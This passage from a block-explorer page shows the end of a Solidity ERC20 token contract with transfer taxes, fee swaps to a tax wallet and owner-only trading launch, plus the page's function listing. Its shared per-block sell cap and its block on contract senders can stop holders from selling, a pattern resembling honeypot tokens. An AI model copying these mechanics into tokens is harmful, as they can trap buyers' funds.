                !_feeExcluded[to] &&
                to != _taxWallet
            ) {
                _buyCount++;
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (
                !inSwap &&
                to == uniswapV2Pair &&
                from != _taxWallet &&
                swapEnabled &&
                _buyCount > _preventSwapBefore
            ) {
                require(!isContract(from), "ERC20: External call");
                if (block.number > lastSellBlock) {
                    sellCount = 0;
                }
                sellCount = sellCount + _getAmountOut(amount);
                require(sellCount <= _maxSwapThres, "Max swap limit");
                if (contractTokenBalance > _taxSwap)
                    swapTokensForEth(_taxSwap > amount ? amount : _taxSwap);
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance >= 0) {
                    sendETHToFee(address(this).balance);
                }
                lastSellBlock = block.number;
            }
        }

        _balances[from] = _balances[from].sub(amount);
        _balances[to] = _balances[to].add(amount.sub(taxAmount));
        if (taxAmount > 0) {
            _balances[address(this)] = _balances[address(this)].add(taxAmount);
            emit Transfer(from, address(this), taxAmount);
        }
        if (to != _deadAddr) emit Transfer(from, to, amount.sub(taxAmount));
    }

    function sendETHToFee(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function enableTrading() external onlyOwner {
        require(!tradingOpen, "Trading is already open");
        uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(uniswapV2Router), _tTotal);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );
        swapEnabled = true;
        tradingOpen = true;
        IERC20(uniswapV2Pair).approve(
            address(uniswapV2Router),
            type(uint256).max
        );
    }

    function isContract(address _addr) internal view returns (bool) {
        uint256 size;
        assembly {
            size := extcodesize(_addr)
        }
        return size > 0;
    }

    function rescueEther() external onlyOwner {
        require(address(this).balance > 0);
        payable(_msgSender()).transfer(address(this).balance);
    }

    receive() external payable {}

    function setTaxWallet(address payable newWallet) external {
        require(_msgSender() == _taxWallet);
        _taxWallet = newWallet;
    }

    function _getAmountOut(uint256 amount) internal view returns (uint256) {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        uint256[] memory amountOuts = uniswapV2Router.getAmountsOut(
            amount,
            path
        );
        return amountOuts[1];
    }
}

Read Contract

_maxSwapThres 0xdc567d0a → uint256
_taxSwap 0x34376f3b → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 7 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
enableTrading 0x8a8c523c
No parameters
renounceOwnership 0x715018a6
No parameters
rescueEther 0x20969d07
No parameters
setTaxWallet 0xea414b28
address newWallet
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address